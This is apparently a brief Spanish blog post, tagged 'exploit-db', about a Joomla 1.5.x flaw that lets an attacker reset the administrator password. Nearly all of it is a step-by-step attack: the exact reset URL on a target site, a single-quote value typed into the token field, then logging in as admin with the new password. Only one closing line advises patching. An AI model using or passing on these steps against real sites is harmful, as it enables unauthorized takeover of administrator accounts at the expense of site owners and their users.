Posts Tagged ‘ exploit-db ’

Vulnerabilidad en Joomla 1.5 – Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Vulnerabilidad que permite el cambio de la contraseña de administrador, en pocos simples pasos:

1. Ir a la url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Escribir en el campo “token” el siguiente caracter: ‘ y dar click en SUBMIT

3. Escribir el nuevo password para admin

Bingo!!
4. Ir a la url del sitio : target.com/administrator/
5. Loguearse como admin con el nuevo password
Conclusión: la de siempre, parchar y mantener actualizado su Joomla, o en su defecto cambiar por otras alternativas XD
Saludos
Fuente:
Anuncios